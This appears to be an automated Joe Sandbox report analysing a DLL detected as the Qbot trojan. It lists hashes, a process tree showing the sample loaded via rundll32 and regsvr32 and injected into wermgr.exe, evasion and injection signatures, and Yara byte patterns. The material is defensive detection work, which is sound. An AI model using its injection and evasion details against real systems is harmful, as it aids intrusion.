Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pebbles.dat.dll

Overview

General Information

Sample Name:pebbles.dat.dll
Analysis ID:715156
MD5:d89521adaf6418e6ebe43b1a1a9d2af9
SHA1:38cac8495ef43e51cdac1cb5e85d10137b365bee
SHA256:1965dc57456d4fc01b6ce0f242d80776fe08a16354e6177255cba618348355ac
Tags:dll
Infos:

Detection

Qbot
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Qbot
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Execute DLL with spoofed extension
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Entry point lies outside standard sections
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Drops PE files
Tries to load missing DLLs
Found evasive API chain checking for process token information
Registers a DLL
PE file overlay found
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5328 cmdline: loaddll32.exe "C:\Users\user\Desktop\pebbles.dat.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)
    • conhost.exe (PID: 5864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5900 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5792 cmdline: rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • wermgr.exe (PID: 4884 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
    • regsvr32.exe (PID: 5696 cmdline: regsvr32.exe /s C:\Users\user\Desktop\pebbles.dat.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • wermgr.exe (PID: 3472 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
      • audiodg.exe (PID: 3472 cmdline: C:\Windows\system32\AUDIODG.EXE 0x2ac MD5: 0B245353F92DF527AA7613BA2C0DA023)
    • rundll32.exe (PID: 5784 cmdline: rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • wermgr.exe (PID: 612 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
    • rundll32.exe (PID: 5360 cmdline: rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllUnregisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5580 cmdline: rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,bewailable MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
    00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Qbot_92c67a6dunknownunknown
    • 0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
    00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Qbot_3074a8d4unknownunknown
    • 0x1ca14:$a4: %u;%u;%u;
    • 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x
    • 0x1cdd8:$a6: %u&%s&%u
    • 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16
    • 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8
    • 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D
    • 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10
    • 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
    00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
      00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmpWindows_Trojan_Qbot_92c67a6dunknownunknown
      • 0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      9.2.wermgr.exe.970000.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
        9.2.wermgr.exe.970000.0.raw.unpackWindows_Trojan_Qbot_92c67a6dunknownunknown
        • 0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
        9.2.wermgr.exe.970000.0.raw.unpackWindows_Trojan_Qbot_3074a8d4unknownunknown
        • 0x1ca14:$a4: %u;%u;%u;
        • 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x
        • 0x1cdd8:$a6: %u&%s&%u
        • 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16
        • 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8
        • 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D
        • 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10
        • 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
        3.2.regsvr32.exe.990000.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
          3.2.regsvr32.exe.990000.0.raw.unpackWindows_Trojan_Qbot_92c67a6dunknownunknown
          • 0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
          Click to see the 61 entries

          Sigma Signatures

          Data Obfuscation

          barindex
          Sigma detected: Execute DLL with spoofed extension
          Source: Process startedAuthor: Joe Security: Data: Command: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1, CommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\pebbles.dat.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 5328, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1, ProcessId: 5900, ProcessName: cmd.exe

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: pebbles.dat.dllReversingLabs: Detection: 16%
          Machine Learning detection for sample
          Source: pebbles.dat.dllJoe Sandbox ML: detected
          Source: pebbles.dat.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
          Source: pebbles.dat.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: E:\cpp\out\out\desktop.pdb source: regsvr32.exe, 00000003.00000002.269410643.000000006D4B4000.00000080.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.269325200.000000006D4B4000.00000080.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.269366163.000000006D4B4000.00000080.00000001.01000000.00000003.sdmp, pebbles.dat.dll
          Source: Binary string: amstream.pdb source: wermgr.exe, 00000007.00000003.270246920.0000000004B21000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.269783536.0000000003761000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.270387540.0000000001081000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: amstream.pdbGCTL source: wermgr.exe, 00000007.00000003.270246920.0000000004B21000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.269783536.0000000003761000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.270387540.0000000001081000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0099C123 FindFirstFileW,FindNextFileW,3_2_0099C123
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0445C123 FindFirstFileW,FindNextFileW,4_2_0445C123
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00995D1E GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,BitBlt,GetCursorInfo,CopyIcon,GetIconInfo,GetObjectW,DrawIconEx,SelectObject,GetObjectW,GetDIBits,DeleteDC,DeleteDC,DeleteObject,3_2_00995D1E

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 9.2.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 9.2.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 3.2.regsvr32.exe.990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 3.2.regsvr32.exe.990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 4.2.rundll32.exe.4450000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 4.2.rundll32.exe.4450000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 7.0.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 7.0.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 5.2.rundll32.exe.2ee0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 5.2.rundll32.exe.2ee0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 4.3.rundll32.exe.4430000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 4.3.rundll32.exe.4430000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 7.0.wermgr.exe.e40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 7.0.wermgr.exe.e40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 3.3.regsvr32.exe.590000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 3.3.regsvr32.exe.590000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 8.0.wermgr.exe.12a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 8.0.wermgr.exe.12a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 4.2.rundll32.exe.4450000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 4.2.rundll32.exe.4450000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 3.3.regsvr32.exe.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 3.3.regsvr32.exe.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 9.2.wermgr.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 9.2.wermgr.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 7.2.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 7.2.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 9.0.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 9.0.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 9.0.wermgr.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 9.0.wermgr.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 5.3.rundll32.exe.2d60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 5.3.rundll32.exe.2d60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 4.3.rundll32.exe.4430000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 4.3.rundll32.exe.4430000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 5.2.rundll32.exe.2ee0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 5.2.rundll32.exe.2ee0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 3.2.regsvr32.exe.990000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 3.2.regsvr32.exe.990000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 7.2.wermgr.exe.e40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 7.2.wermgr.exe.e40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 5.3.rundll32.exe.2d60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 5.3.rundll32.exe.2d60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 8.0.wermgr.exe.12a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 8.0.wermgr.exe.12a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000007.00000000.268101186.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000007.00000000.268101186.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000004.00000003.261746477.0000000004430000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000004.00000003.261746477.0000000004430000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000008.00000000.268192549.00000000012A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000008.00000000.268192549.00000000012A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000003.00000003.261366767.0000000000590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000003.00000003.261366767.0000000000590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000009.00000002.270604125.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000009.00000002.270604125.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000005.00000003.261991952.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000005.00000003.261991952.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000009.00000000.268299338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000009.00000000.268299338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000005.00000002.268833263.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000005.00000002.268833263.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: pebbles.dat.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
          Source: 9.2.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 9.2.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 3.2.regsvr32.exe.990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 3.2.regsvr32.exe.990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.2.rundll32.exe.4450000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.2.rundll32.exe.4450000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 7.0.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 7.0.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 5.2.rundll32.exe.2ee0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 5.2.rundll32.exe.2ee0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.3.rundll32.exe.4430000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.3.rundll32.exe.4430000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 7.0.wermgr.exe.e40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 7.0.wermgr.exe.e40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 3.3.regsvr32.exe.590000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 3.3.regsvr32.exe.590000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 8.0.wermgr.exe.12a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
